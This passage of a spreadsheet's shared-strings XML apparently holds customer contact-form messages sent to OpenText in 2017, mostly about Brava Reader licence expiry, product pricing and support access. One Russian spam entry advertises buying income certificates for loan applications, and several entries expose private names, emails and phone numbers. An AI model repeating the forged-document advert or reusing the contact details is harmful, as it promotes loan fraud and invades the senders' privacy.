    <t>Bonjour, étudiant en Master 1 en Information et communication, parcours documents électroniques et flux d'information à l'université de Nanterre, je me permets de vous contacter dans le cadre d'un contrat de professionnalisation pour la rentrée 2017. En effet, un de vos collègues à téléphoner au professeur de ma filière pour recruter des étudiants en alternance. Je souhaiterais savoir s'il est toujours d'actualité. Si c'est le cas, pourriez-vous m'indiquer ou est-ce que je pourrais envoyer ma candidature ?_x000D_
_x000D_
Bien cordialement,_x000D_
_x000D_
Duy Truong DANG</t>
  </si>
  <si>
    <t>when opening brava reader, i'm told in 11 days it will need an update even after just downloading right off the site.</t>
  </si>
  <si>
    <t>Hi There... I got your Brava Reader version and it show that it will expire in April 18 2017... Is the download that you guys made it available correct? If not I will appreciate if you send me the link for your update version of Brava Reader</t>
  </si>
  <si>
    <t>Looking for FormulaOne ActiveX OCX</t>
  </si>
  <si>
    <t xml:space="preserve">I have rec'd your W9; the W9 address is this where we can sent all purchase order's (PO) Address: OPEN TEXT INC; 951 Mariners Island Blvd., Suite 700, San Mateo, CA 94404 this is my question. </t>
  </si>
  <si>
    <t>Thought I downloaded update today when instead it was same version I have right now. When will update be available? Please advise, thank you.</t>
  </si>
  <si>
    <t>Need access for remit for payments being received via email</t>
  </si>
  <si>
    <t xml:space="preserve">We're Moving! Exciting things are happening at Diagnostic Imaging Centers, P.A., and we want to share some important news with you. We are proud to announce that due to our remarkable growth, our Diagnostic Imaging Centers currently located at 5500 and 5520 College Boulevard, Overland Park, KS 66211 along with our Administrative Offices located at 7101 College Boulevard,   Suite 1200, Overland Park, KS 66210 are moving to a new location.  All office phone numbers will remain the same._x000D_
  _x000D_
Effective Monday, June 5, 2017, our new address will be: _x000D_
6650 W. 110th Street_x000D_
Overland Park, KS  66211-1501_x000D_
_x000D_
Please contact Kelly Thomas at 913-319-8482 or email kthomas@dic-kc.com if you have any questions.  _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello we wanted o verify if your system assigned reference numbers (doc stamp) to each document and if it is compatible with  Litera? </t>
  </si>
  <si>
    <t>I was driving past your offices yesterday in Addison.  I wanted to reach out and see who the correct person would be to discuss any group events here at the stadium.  This could be an employee outing, client entertainment or anything else you have a need for.  Let me know as we would love to have FC Dallas and Toyota Stadium a consideration for your company in the future._x000D_
Regards_x000D_
MD</t>
  </si>
  <si>
    <t>Brava Reader and Brava DWG reader I just downloaded are set to expire in 11 days - ...  Is there a more updated version?</t>
  </si>
  <si>
    <t>Hello, I have the BravaReader 16 application installed on one of our Probate Court pc's.  It is saying the license will expire in 11 days.  I have uninstalled and reinstalled from your site and it still says 11 days.  This is a free application (or so your website says).  Is there another download that I need to be using so this pop up doesn't happen anymore?</t>
  </si>
  <si>
    <t>Invoice SUS08454689TX - need more detailed information</t>
  </si>
  <si>
    <t xml:space="preserve">Investigating OpenText for SAP Data Archiving. Looking for reasons to use OpenText rather than just storing archived documents at the filesystem level on cheap disk. Thanks. </t>
  </si>
  <si>
    <t>Info on services provided</t>
  </si>
  <si>
    <t>How do I contact the product manager for Opentext Imaging Web Viewer?</t>
  </si>
  <si>
    <t>How update the password for a server to access customer's VPN (tunel)?</t>
  </si>
  <si>
    <t>I am trying to find information regarding your roadmap for the TeamSite and OpenDeploy product lines.</t>
  </si>
  <si>
    <t>Dear Open Text,   Do you have enough courage that your company following statutory norms in respect of payments of your security guards deployed at hyderabad premises.  Do you have enough courage to say that your contractors and sub contractors are depositing their statutory benefits to their respective accounts.  I have sufficient information to challenge open text that your facility mgmt. agencies making fraud with the negligence of your management staff and your internal auditors.</t>
  </si>
  <si>
    <t>I need to find the location I can download the latest version of the FirstClass server. We are currently running version 12.0. Our serial number is 1010802. Also, I need to find out if we have the correct license for the upgrade. The instructions say if the OTSW users match the regular uses we should be good, but I see nothing indicating a number of OTSW users.</t>
  </si>
  <si>
    <t>can not update free reader</t>
  </si>
  <si>
    <t>DM issue within Outlook 2013</t>
  </si>
  <si>
    <t>Connection from Opentext Analytics Designer fails to connect to Hive datasource connection. Need help with connection.</t>
  </si>
  <si>
    <t>I want to know information about the trial and complete version of Opentext Analytics IHub. Thanks</t>
  </si>
  <si>
    <t>Hello Open Text,_x000D_
_x000D_
I work with Eric VIERO (Thales) for the project TeamOnline based on Livelink 9.7.1._x000D_
_x000D_
Can you activate my account please ?_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Clyde MOUFFRANC</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for solution to Migrate to cloud base Fax. </t>
  </si>
  <si>
    <t>My Brava Reader was telling me an update is required before April 18, so I downloaded and installed the update and it still tells me an update is required before April 18.  What gives?</t>
  </si>
  <si>
    <t>We are interesting in Teleform scanning software. Maybe you could share local contact.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
Ich möchte mit meinem Team ein Startup (3 Leute) umsetzen. Wir haben noch keinen CTO – können uns eine Zusammenarbeit auf Anteilsbasis vorstellen._x000D_
_x000D_
Es geht darum eine Plattform zu schaffen, die Dienstleistungen vermittelt – ein bisschen besser als was es gerade gibt. Unsere Idee ist sehr detailiert und soweit umsetzbar. _x000D_
Die programmiertechnische Aufgabe lautet, eine Plattform zu schaffen, mit Datenbank im Hintergrund, mit Web und App Zugang, die Bezahlsysteme, Controlling- Systeme für uns, Buchhaltungsprogramme, Sicherheits/Datenschutzaspekte etc. unter einen Hut zu bringen._x000D_
Der „Design“- Teil kann von Ihnen übernommen werden, ich erwarte dies aber nicht und suche hier dann als nächsten Schritt weiter._x000D_
_x000D_
_x000D_
Meine Suche nach der technischen Rolle läuft im Moment einerseits über Privatleute (Universität, Gründerzentren etc.) – auf der anderen Seite suche ich Firmen per Websuche und bin so bei Ihnen gelandet._x000D_
_x000D_
_x000D_
Ich würde mich, wenn Interesse besteht, über ein persönliches Gespräch sehr freuen – Ich bin ab dem 18.04 wieder in München._x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Michael Thiel_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
i'd like to know how to buy a GUPTA Report Builder license please. Do you have any reseller in France i can contact?_x000D_
thx_x000D_
Laurent</t>
  </si>
  <si>
    <t>Hi. My Brava Reader has a popup stating it requires an update, but when I tried to download a new version, it looks like the file downloaded was for the same version I had before._x000D_
_x000D_
I would appreciate it if you could send me a link to an updated version of the software._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>My Brava reader says there is 11 days left, I've got and installed the latest update from your website, but it still says 11 days left._x000D_
_x000D_
Thank You_x000D_
_x000D_
Mark</t>
  </si>
  <si>
    <t>Hello,_x000D_
We have a customer who is on RightFax Enterprise Manager V10.0.0.2032, they are currently on Cisco CUCM V8.5 and need to upgrade to V11.5, do they need to upgrade thier RightFax also? IE does RightFax V10.0.0.2032 support Cisco CUCM V11.5?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Ian Way</t>
  </si>
  <si>
    <t>Request for partnership to quote for opportunities in SL.</t>
  </si>
  <si>
    <t xml:space="preserve">                                                                                                                    7th April 2017_x000D_
_x000D_
To whom it may concern_x000D_
_x000D_
_x000D_
Hi,_x000D_
I could be a great benefit for your business by making e.g. a report on export opportunities or fair arrangement, or by working in various administrative tasks. I am looking for a job opportunity in Trois-Rivières/Montreal area starting July 2017. My husband will work on a project on Valmet Technologies in Trois-Riviéres for a year. My language skills include English and French. I have previously worked and lived in the USA, Switzerland and currently in Finland. My current job as a Secretary of the Heads at the University of Jyväskylä involves working in multidisciplinary teamwork with multiple nationalities. I am happy to discuss the matter further._x000D_
_x000D_
Salut,_x000D_
je suis une professionnelle positif, proactif et dynamique avec une combinaison unique de compétences et de capacités acquises lors d'une carrière diversifiée et enrichissante aux Etats-Unis, en Suisse et actuellement en Finlande. Je serais intéressé de vous connecter si vous êtes un changeur de carrière ayant besoin d'un CV gagnant. Écris-moi sur anna.m.h.kononen@jyu.fi pour en savoir plus._x000D_
_x000D_
Hei,_x000D_
voisin tehdä yrityksellenne selvityksen vientimahdollisuuksista tai messujärjestelyt tai työskennellä hallinnollisena assistenttinanne Quebecissä. Muutan Trois-Rivièresiin heinäkuussa, insinöörimies tekee Valmetin projektin siellä, kestää vuoden. Osaan ranskaa ja englantia, olen aiemmin työskennellyt ulkomailla Yhdysvalloissa ja Sveitsissä._x000D_
Keskustelen mielelläni asiasta lisää._x000D_
_x000D_
_x000D_
LinkedIn: https://www.linkedin.com/in/anna-kononen-a26b0a8b/_x000D_
_x000D_
_x000D_
_x000D_
Kind regards: Anna _x000D_
  _x000D_
Anna Kononen_x000D_
Secretary_x000D_
University Services / Service Center_x000D_
Faculty of Mathematics and Science_x000D_
PL 35, 40014 Jyväskylän yliopisto_x000D_
Room:  MaD356, Ahlmaninkatu 2_x000D_
FI-40014 University of Jyväskylä, FINLAND_x000D_
email: anna.m.h.kononen@jyu.fi_x000D_
Tel.: +358 (40) 576 0236_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>My boss want to use the EoD in our lab.As the buyer of the lab, _x000D_
I need know how to buy this software,and what kind of the product we can get(Disks or password)?</t>
  </si>
  <si>
    <t>Get the trial version of e.SpreadSheet 11 for system upgrade</t>
  </si>
  <si>
    <t>I want further details on how to install Xpression Reports (Documentum) locally to learn how to use Documentum since we are planning to use it on an upcoming project.Please provide how to access Xpression services._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Information on GXS Catalog for my company that is entering the footwear industry </t>
  </si>
  <si>
    <t>Few of our team members need to get some knowledge on how to generate reports using XPression. I would like to know where we can download documents related to the product and how to download the tools to work with Xpression</t>
  </si>
  <si>
    <t>I just downloaded the installer for BravaReader v16.0.2.13, and it started up with a renewal date of 4/19/2017. In the past, the renewal date was set out for 3 months. Has something changed?</t>
  </si>
  <si>
    <t xml:space="preserve">our rightfax system is abandoning faxes after 1 attempt even though the settings are set to 5 tries, 5 minutes apart._x000D_
_x000D_
_x000D_
Fax to Vital Records abandoned after 1 attempts._x000D_
------------------------------------------------------------_x000D_
From: Jack Mullen_x000D_
------------------------------------------------------------_x000D_
4/4/2017 4:44:57 PM Transmission Record_x000D_
	Sent to 9514867047 with remote ID "9514867047"_x000D_
	Result: (3931) Equipment busy tone detected_x000D_
	Page record: 1 - 2_x000D_
	Elapsed time: 00:00 on channel 3_x000D_
</t>
  </si>
  <si>
    <t>Lands' End does have a customer support contract, but I do not know what the information that it is asking for. I need access to the customer support portal, please. This is my new position. I am taking over for Trisha Stanton.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs_x000D_
I have interested  about OpenText/Documentum and want solve the following doubts:_x000D_
_x000D_
1. Whats the cost of licence OpenText and Documentum, the pay is only one time?_x000D_
2. Whats the cost of maintenance Opentext and Dcocumntum  after sale?_x000D_
3. The cost of maintenance  is include in the cost of licence ?_x000D_
4. if i need high availability plataform,  is additional cost ?_x000D_
5. Can we have instructor for to train and development in the tools?_x000D_
6. What is the maximun number documents than support openText and Documentum or depend the infraestructure Scalable ?_x000D_
7. How must be that infraestructure Scalable, the architecture, for example put apache solr scalable, the storage  etc._x000D_
_x000D_
8. The idea of the solution is support public(many people working) , for storage the documents is posible  there be are many users with  a documents interacting from a application and use the ECM(OpenText or Documentum) for storage them, is possible this  setting?_x000D_
_x000D_
_x000D_
We appreciate the helpful._x000D_
</t>
  </si>
  <si>
    <t>I've download and install `FREE' Brava Reader but it show a warning  it will expire in 15 days. Am I correct this application are no longer free and it require a yearly license. I only needed it to view tif files._x000D_
Thank you,_x000D_
Jack</t>
  </si>
  <si>
    <t xml:space="preserve">LegalKey products: Do you support Windows 10. Please provide any supporting documentation </t>
  </si>
  <si>
    <t>Free Brava Reader...we've been using the free version of brava reader for years in our company and have just noticed that when it asks us to update it that it doesn't truly update.  Are things changing or are we doing something wrong?</t>
  </si>
  <si>
    <t>CALL ME PLEASE</t>
  </si>
  <si>
    <t>Signing up for email communications.</t>
  </si>
  <si>
    <t>We have been using Brava Reader at no cost for a while. Is it not available at no cost any longer?</t>
  </si>
  <si>
    <t>Recemos um email a respeito de uma ferramenta de automação de recebimento de notas fiscais e gostaríamos de conhecer um pouco dessa ferramenta.</t>
  </si>
  <si>
    <t>support with RightFax</t>
  </si>
  <si>
    <t>I downloaded the install file for Brava reader and it says I have 12 days before it expires. Is that correct or will a new install file be posted in 12 days? Also, can I get a quote on 9-10 licenses for Brava reader? Thanks!</t>
  </si>
  <si>
    <t>Information about BIRT mobile product.</t>
  </si>
  <si>
    <t>New company needing an OpenText Active Catalogue subscription.</t>
  </si>
  <si>
    <t xml:space="preserve">I downloaded the link that was sent to me via email so that I could download Brava Reader. I installed it, but it expires on 4/19/2017. Usually when I get the new download it doesn't expire for 3 months. When will the new download be available? It is used daily, so I was wondering if the new one is available prior to the expiration of the current one. </t>
  </si>
  <si>
    <t>I have been asked to find out if it is possible to run TLE in the cloud?</t>
  </si>
  <si>
    <t xml:space="preserve">По данным официальной статистики доход подавляющей массы наших сограждан приблежён к минимальному либо они сегодня вовсе работают без оформления. Неимение учетных записей в трудовой книге - это выслуга лет, какой не будет учитываться при назначении пенсии. В таких условиях притязать на занятие хорошо оплачиваемой должности либо приобретения стандартного заработка по окончании трудовой деятельности нереально. _x000D_
Оформление узкопотребительского или автокредита допускается при наличии справки 2-НДФЛ. Официальный заработок, прописанный в документе, этого откровенно будет мало для оформления ссуды. Наниматель не станет рисковать и не укажет действительно выплачиваемый заработок. Означенные выше неприятности имеют приемлемое решение, и состоит оно в приобретении необходимых бумаг, оформленных в согласовании с функционирующим законодательством. _x000D_
 _x000D_
 _x000D_
[url=http://2ndflmoscva.ru/doc-credit.html]РєСѓРїРёС‚СЊ СЃРїСЂР°РІРєСѓ РґР»СЏ РєСЂРµРґРёС‚Р°[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to set up a time to have a webinar on ecm software that you might be able to help us with. We currently do not have one. We are looking for retention organization and automation._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Want to know if the RightFax MFP Integration connector will work for an Konica Minolta c368 for scan to fax via rightfax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Trying to find out if Team Developer version 6.2 is still supported.  Is there an end of life announced for it?  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Boa tarde_x000D_
Meu nome é Antonio, trabalho no Sebrae do Paraná e mais uma vez venho pedir sua ajuda, pois estamos iniciando um processo de licitação para serviços nas ferramentas Opentext ( portal ) e precisamos contatar alguns fornecedores no Brasil. Seria possível nos passar uma relação de fornecedores de serviços Opentext? Fico no aguardo, obrigado!_x000D_
</t>
  </si>
  <si>
    <t>Would like to understand more on new internet fax system,  also would like to have a Demo access.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I am working on integration with: _x000D_
Media Management_x000D_
Version 10.5_x000D_
Patch: 6_x000D_
_x000D_
I am looking for support information, but i am not able to find any. Could you point me in the right direction? _x000D_
_x000D_
Thanks,_x000D_
Hristo _x000D_
</t>
  </si>
  <si>
    <t>"An update for Brava! Reader will be required within 12 days._x000D_
Please contact your supplier for an update." "OpenText Brava! Reader is a no-cost application that allows you to view PDF, TIFF, JPG and OpenText Content Sealed Format (CSF) files. Viewing options include: monochrome/color toggle, thumbnails, zoom, magnifier, rotate, mirror, measure, and the ability to save the current view as JPG."  If this is a "no-cost" application, why am I getting this message?  Please Advise.</t>
  </si>
  <si>
    <t>I’m trying to monitor on our exchange the mailbox traffic and content of emails for security/compliance/governance and IP protection</t>
  </si>
  <si>
    <t>Licensing question since we have changed our name to Fibernet Direct</t>
  </si>
  <si>
    <t>Informações sobre o software IXOS</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
Could I check if this version of software (Spicer Imagenation v8.1_x000D_
) is compatible with Windows 10x 64 bit machine and if not, do we have any higher version which could be used?_x000D_
FYI, we are in building phase to roll out Windows 10 for our client and we are testing to see if those apps which are listed on windows 7 are compatible with Windows 10?_x000D_
_x000D_
Regards_x000D_
Mahtab</t>
  </si>
  <si>
    <t xml:space="preserve">The version you emailed me still says it expires in 13 days? Giving you all my information and then receiving an outdated download is really annoying. </t>
  </si>
  <si>
    <t>I am having issues with Open Text Exceed 14 and want to see if the bugs I am experiencing have been resolved in version 15. When I open multiple telnet sessions and then close one of them, there is a long delay and then the remaining tabs are replicated, sometimes several times over. Sometimes when I close a tab, it crashes and I lose all my telnet connections.</t>
  </si>
  <si>
    <t>Would like to learn how to become a Service Vendor in our region.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Cannot log in to system.  </t>
  </si>
  <si>
    <t xml:space="preserve">Bom dia, _x000D_
_x000D_
Meu nome é Tiago, sou funcionário da área de projetos no centro de serviços compartilhados na Ultragaz e eu estou a frente de um projeto de BPO na área de gestão eletrônica de documentos. Tendo isto em vista, estou prospectando algumas empresas que prestam este serviço e gostaria de saber se vocês tem uma apresentação introdutória da sua ferramenta para que eu analise._x000D_
_x000D_
Aguardo seu contanto,_x000D_
Atenciosamente _x000D_
Tiago Kunitaki _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We currently process  5,000 - 10,000 invoices per month and are looking at various document capture solutions._x000D_
_x000D_
We have reviewed a number of other vendors and would like to setup a demo ASAP._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We are using Open Text for SAP and very speficially for EFM solution. The current version is 3.5 and we wish to upgrade. I have following query, if someone can kindly answer_x000D_
_x000D_
1. I understand latest version is 16; can 3.5 system be upgraded to 16? and if yes what is process?_x000D_
2. What are the prerequisite for upgrade?_x000D_
3. What is time and cost to be considered for upgrade?_x000D_
4. What are the additional benefits of upgrading?_x000D_
_x000D_
You can email me the answer; looking forward._x000D_
_x000D_
Regards_x000D_
Sanjay</t>
  </si>
  <si>
    <t>All this information gathering just to use a pdf reader is ridiculous and invasive</t>
  </si>
  <si>
    <t>Hello - is there an expected ETA for when the next version of Brava Reader will be available?  Thank you!</t>
  </si>
  <si>
    <t>The update for Brava Reader is the older version, not the update. Please update.  Thank you, Dean</t>
  </si>
  <si>
    <t xml:space="preserve">would you please tell me who to contact, in Italy, for info about OpenText certification programs/exams ? I need an italian supplier, in Rome, to upgrade the skill of 3 persons in a very short time in order to have a chance for an important bid. Thank you </t>
  </si>
  <si>
    <t>Seeking to make contact with Mr. Tom Jenkins to schedule him as keynote speaker.</t>
  </si>
  <si>
    <t>Am interested in the latest version of DocsOpen and need to talk to someone about it, what would work for us, and how much it would cost</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I downloaded the newest version of FREE BRAVA! READER but notified that the build has not changed and after updating the software on a client the renewal/update is still necessary until 17/04/19._x000D_
Can you help ?_x000D_
Thanks in advance</t>
  </si>
  <si>
    <t>I cant access to my support, could you give me access?</t>
  </si>
  <si>
    <t xml:space="preserve">being Educational Centre we have an order from Corporate Client to train 10-14 persons here in Kazakhstan, on the course of 3-0300 Opentext Directory Services (OTDS) Installation and Configurationv 10.5.  There is a computer class .The dates of training : during April- June 2017. Could you please train such course coming to our Corporate Client Site? If  yes how much it will be cost?_x000D_
Our site is www.ciscotrain.kz_x000D_
_x000D_
Balakayeva Gulzifa_x000D_
CEO_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Workflow tool for Legal onboarding in London/ Madrid</t>
  </si>
  <si>
    <t>Unpaid Invoice_x000D_
Please supply a valid accounts address apgeneralenquiries@opentext.com does not appear to work</t>
  </si>
  <si>
    <t>On request I have downloaded the free Brava! Reader, because a message is shown on the screen saying “An update for Brava! Reader will be required within 12 days”.  But after installing the new update, the message is still shown on the screen.  Please put a new file at the download side.</t>
  </si>
  <si>
    <t>"OpenText™ Cloud Fax" was implemented in our Tokyo office. We would like to see if "Cloud Fax" is available and suitable for our Hong Kong office, appreciated if you could provide local contact for further discussion.</t>
  </si>
  <si>
    <t>Want to explore vendors who could provide an SAP IXOS Scanning Solution</t>
  </si>
  <si>
    <t>Dear all, Do you offer a solution that records and archives customer interactions (mouse movements, clicks etc) on a website? If yes, please answer the following 3 questions: 1) What is the product name, 2) Is the product available as On-Premise solution? 3) Can personalized transactions be tracked (for customers that have logged in)? Thanks and kind regards, Serhat Guenes</t>
  </si>
  <si>
    <t>Dear Madam or Sir,_x000D_
_x000D_
we are interested in a knowledge managemetn software with a special focus on banks._x000D_
_x000D_
Could you please call me back for further information on your prodcut offerings._x000D_
Thank you,_x000D_
Thorsten Kud</t>
  </si>
  <si>
    <t xml:space="preserve">	Dear Sir/Madam,_x000D_
_x000D_
I am the technical readiness project manager for Apotti Oy ( www.apotti.fi/en/what-is-apotti ). We are implementing the Epic ( www.epic.com ) as Southern Finland’s area wide social and healthcare system. I now have the urgent task of finding possible faxing solution for Apotti. Our Epic counterparts have given us a list of providers that Epic has used / worked with before._x000D_
_x000D_
I am writing to you to enquire if you do offer fax solutions also in Finland? Either directly or through a partner. Should this be the case, then could you please hook me up with a contact ASAP._x000D_
_x000D_
Thank you in advance for you swift reply._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Tuukka Uusheimo_x000D_
Project Manager_x000D_
_x000D_
Oy Apotti Ab_x000D_
Sturenkatu 16 (PO Box 26)_x000D_
FI-00501 HELSINKI_x000D_
p. +358 50 410 7499_x000D_
tuukka.uusheimo@apotti.fi _x000D_
www.apotti.fi_x000D_
</t>
  </si>
  <si>
    <t>we are looking for invoice automation in SAP and looking for demo on Open Text tool</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for Licience information and costs for OpenText Wireless DMS - we are already using OpenText DM 10 in our organization._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Unable to produce docsets in XDOC._x000D_
error:_x000D_
DfException:: THREAD: WrapperStartStopAppMain; MSG: [DM_STORAGE_E_BAD_TICKET]error:  "Use of invalid ticket for storage object with name filestore_01; storage may be improperly configured._x000D_
Ticket was 00000000802fe726.  Data Ticket was 1."; ERRORCODE: 100; NEXT: DfException:: THREAD: WrapperStartStopAppMain; MSG: [DM_STORAGE_E_RENAME_EXT_SEARCH]error:  "Unable to rename a file matching (E:\Documentum\data\xdoc\content_storage_01\0000d805\80\2f\e7\26*) to (E:\Documentum\data\xdoc\content_storage_01\0000d805\80\2f\e7\26.jar).  Operating System error: The system cannot find the file specified</t>
  </si>
  <si>
    <t>Hi, I recently joined Mallincrodt's Headquerters in STaines-upon-Thames (UK) as Director Search and Evaluation. In the past, I have used EMC Documentum eRoom, an easy-to-use online team collaboration software that enables distributed teams to work together more efficiently. Is such a software still available ?</t>
  </si>
  <si>
    <t>Documentum accountmanager and strategy of OPen text regarding Documentum</t>
  </si>
  <si>
    <t>Nerw version of BravaReader</t>
  </si>
  <si>
    <t>Greeting,_x000D_
I have a request that is pending since few days.. I need some licenses for OpenText..</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Sir /Mam,_x000D_
_x000D_
We are an internet base company for image editing services &amp; have an excellent experience on image editing related services. We offer and provide online high quality image editing services like Clipping Path, Photo Editing, Cut Out Image, Background Removing, Shadow Creating, Photoshop Masking (layer &amp; channel),Photo Retouch, Jewellery Retouching, Image Manipulation, Neck-Joint, Vector Image Conversion, Logo Design, Cropping &amp; Resizing and all creative design services. We also provide image editing services for e-commerce websites at very low cost. We can make your product photos very good as you required. Our price is very very low and quality is very good than others company. We are also provide Website Design, Web Development, SEO related services with very low cost._x000D_
_x000D_
''We start counting from  $0.25  per image''_x000D_
_x000D_
We do unlimited revisions until or unless the client is satisfied with the work and without adding any cost for it._x000D_
_x000D_
I hope you will also give us a chance to serve you and will try us once._x000D_
_x000D_
Free trial is available for first time clients who are wishing to evaluate our Services Quality._x000D_
_x000D_
_x000D_
-- _x000D_
Best Regard's_x000D_
Clipp Out Line Team_x000D_
www.clippoutline.com_x000D_
</t>
  </si>
  <si>
    <t>Documentum integration with SharePoint queries</t>
  </si>
  <si>
    <t>For learning purpose could you please elaborate difference between Archiving Link vs Open text</t>
  </si>
  <si>
    <t xml:space="preserve">We have selected BIRT for Health Analytics. To date the interface is completed for users and permissions and we are designing some report templates. Creating a data repository is problematic; what technologies to use. Need to connect a few patient health records solutions to a data repository. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear VIP Customer, _x000D_
_x000D_
Hope your business full of luck and success. _x000D_
_x000D_
Please kindly forward our information to your purchasing department. _x000D_
_x000D_
We are specialized in manufacturing plastic injection over 29 years _x000D_
and we start designing, developing and exporting our products for 15 years._x000D_
_x000D_
I would like to show you our light up pen for your consideration. _x000D_
_x000D_
1) Item No.: 017P-1A  Light up diamond pen _x000D_
2) Item No.: 024P-09,10  Light up rose pen      _x000D_
       _x000D_
The diamond could light up when you write. _x000D_
These pens are very beautiful and suitable for your women related products.   _x000D_
We have created various products for your selection. _x000D_
_x000D_
Will you visit the Hong Kong Fair this April?_x000D_
We invite you to visit our booth to see our newest products in April._x000D_
_x000D_
Official Fair Name: Hong Kong Gifts &amp; Premium Fair. _x000D_
Fair Dates : 27th ~ 30th April 2017_x000D_
Venue : Hong Kong Convention &amp; Exhibition Centre_x000D_
Booth number : 1A-D12 in Hall 1 _x000D_
Hope to see you soon!_x000D_
_x000D_
I look forward to offering my best service to you soon.  _x000D_
Thanks &amp; best regards, _x000D_
Sherry Lee_x000D_
KEENFLINT INTERNATIONAL CO., LTD.                 _x000D_
Tel. : + 886- 2- 8685-3289_x000D_
Fax : + 886- 2- 8685-1768_x000D_
E-mail︰b4072@ms34.hinet.net_x000D_
Website: www.keenflint.com.tw_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, My name is Shinsaku._x000D_
I make good use of this freeware very much！_x000D_
_x000D_
When does the latest version show it?_x000D_
I'm using version 16.0.2.13　now._x000D_
_x000D_
Please answer ._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Want to know why this is pooping up on my phone am I being tracked or something and if so by who and why</t>
  </si>
  <si>
    <t>Hi,_x000D_
My name is Abbas, I am currently working on bid for one of our public sector client. _x000D_
_x000D_
I have a technical inquiry about FileIT, does FileIT exposes any API or sdk, which we can integrate with File IT for adding documents._x000D_
_x000D_
Your swift response will be highly appreciated. _x000D_
_x000D_
Regards_x000D_
Abbas Ali</t>
  </si>
  <si>
    <t>Can I please get a price for a self hosted Content Server for 15 users including maintenance costs? Can you please provide a link to a demo of the product?_x000D_
_x000D_
regards,_x000D_
Maria</t>
  </si>
  <si>
    <t>Hi there,_x000D_
 _x000D_
I found your blog after one of my friends shared it with me on Facebook and wanted to run a few things by you. I have some antivirus app projects that I am working on which are right up your alley. Let me know if you have a moment to discuss._x000D_
 _x000D_
Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Request for information on Part 11 compliant electronic Document Management System, both cloud based or integrated into existing systems. We are interested in a solution suitable for the needs of a small biotech/pharma company. </t>
  </si>
  <si>
    <t>Brava Reader needs update, does not want to update.  Interested in purchasing a license</t>
  </si>
  <si>
    <t>Business requires knowledge management application suitable for the pharmaceutical manufacturing and quality sector</t>
  </si>
  <si>
    <t>Need access to support for Unify IDS/ELS is 8.1I to download new odbc and jdbc drivers and new version of IDS/ELS 8.1J to run on RHEL 7.3</t>
  </si>
  <si>
    <t>Gostaria de saber se é possível adquirir o TeamDeveloper + SQLBase para finalidade de uso doméstico/treinamento (apenas uma licença), e qual seria o valor da licença do mesmo._x000D_
Fui desenvolvedor do SqlWindows na década de 90 e estou interessado em rever a ferramenta.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
I was just dropping by to tell you that we have brand new office space at the $156 million development at The Summit at Fritz Farm. We believe OpenText would be a great fit over there. I would love to send you a brochure about the development and office space!_x000D_
_x000D_
If you could forward this email on to Mr. Barrenechea, Mr. Murphy, Mr. Doolittle or any of the other appropriate executives it would be appreciated._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>We currently have "Free Brava Reader" and need to update.  The only download I can find on your site is the "trial version".  Where can I find the update for our current version?</t>
  </si>
  <si>
    <t>We have a Castelle Faxpress Premier fax server that's over six years old and still running on Windows server 2003. We like to know the upgrade options and cost. Please send detail to dyeh@aceto.com</t>
  </si>
  <si>
    <t>Will you be releasing a new version of the Brava Reader that is expiring on 4/19/2017. Build 16.0.2.23 Package 16.0.2.13</t>
  </si>
  <si>
    <t>To discuss a workflow management system which includes a review and approval tool, a MAM system, universal storage, distribution etc.</t>
  </si>
  <si>
    <t>I have a customer (Williamson County) that is currently using RightFax connected to their Avaya system.  They are looking at upgrading to a Cisco system, and I was reaching out to talk to someone about their system and what that would require.  Please let me know what information you need from me. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to contact Leslie Sarauer, in hopes of conducting an interview for a story I am working on for Canadian HR Reporter. The story is about remote work, following IBM's decision to call in their workers — something Leslie brought up at a recent SCNetwork event in Toronto. Please follow up if possible! </t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
Would you like to acquire an email lead list of Day CQ5 Users? _x000D_
_x000D_
This list contains a total of 23655 contacts and includes Contact name, Email address, Business Title, Company name, Phone number, Mailing address along with detailed business information. You can also get to customize this list based on specific titles as per your request._x000D_
_x000D_
Titles available : _x000D_
• CIO, CTO_x000D_
• SVP, VP of IT_x000D_
• Director of IT_x000D_
• VP Engineering, Manufacturing, Operations_x000D_
• Director Engineering_x000D_
• Product Management Specialists and other titles_x000D_
_x000D_
Please let me know if there is someone else I may contact regarding our contact database. Alternatively, I would appreciate you passing this along to right person responsible for making such decisions._x000D_
_x000D_
Best Regards,_x000D_
Cynthia Pierson</t>
  </si>
  <si>
    <t xml:space="preserve">Need OpenText Training in india specifically Process 360,Streamserve and Content server. </t>
  </si>
  <si>
    <t>Dear all,_x000D_
_x000D_
